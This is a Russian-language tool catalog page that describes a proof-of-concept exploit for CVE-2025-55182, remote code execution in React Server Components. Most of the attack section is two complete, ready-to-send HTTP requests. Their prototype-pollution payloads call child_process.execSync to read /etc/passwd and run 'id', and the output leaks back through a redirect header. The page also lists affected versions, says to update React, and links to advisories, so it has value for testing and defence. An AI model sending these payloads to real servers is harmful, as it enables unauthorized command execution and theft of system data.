Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
React2Shell_cve-2025-55182 — Доказательство концепции эксплойта для CVE-2025-55182, демонстрирующее удалённое выполнение кода в серверных компонентах React через небезопасную десериализацию запросов. Включает специально сформированные HTTP-запросы для тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

Доказательство концепции эксплойта для CVE-2025-55182, демонстрирующее удалённое выполнение кода в серверных компонентах React через небезопасную десериализацию запросов. Включает специально сформированные HTTP-запросы для тестирования на проникновение.

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Удаленное выполнение кода в React Server Components — CVE-2025-55182

Всем привет! Надеюсь, у вас отличный день! 😊✨

О чём это?

В React Server Components версий 19.0.0, 19.1.0, 19.1.1 и 19.2.0 обнаружена серьёзная уязвимость безопасности. Затронуты пакеты react-server-dom-parcel, react-server-dom-turbopack и react-server-dom-webpack.

Проблема возникает, когда сервер небезопасным способом считывает данные из запросов. Злоумышленники могут отправить специальные данные, которые заставят сервер выполнить их команды.


Доказательство концепции — полный пример атаки

Ниже приведён полный запрос атаки, демонстрирующий проблему. Команды заменены на безопасные примеры.

Замените на тестируемый сайт.

target-website.com

Запрос атаки №1 — чтение системного файла

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Запрос атаки №2 — проверка информации о пользователе

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Простое объяснение

  1. Сервер считывает данные из запроса
  2. Вредоносные данные могут обмануть сервер, заставив его выполнить команды
  3. Злоумышленники могут выполнить любую команду по своему выбору
  4. Команды спрятаны в отправляемых данных

Что может произойти?

Злоумышленники могут:

  • Выполнить любую команду на сервере
  • Прочитать секретные файлы
  • Получить полный контроль над сервером
  • Похитить все данные

Как исправить

Немедленно обновите React! Установите последнюю версию, в которой устранена эта проблема.


Полезные ссылки

  • Официальный инструмент сканирования
  • Технические детали
  • Уведомление Facebook о безопасности
  • Список OpenWall Security
  • Официальный блог React
  • Уведомление Next.js о безопасности
  • Уведомление Vercel об обновлении

Берегите себя и оставайтесь в безопасности! ✨❤️

Скачать инструмент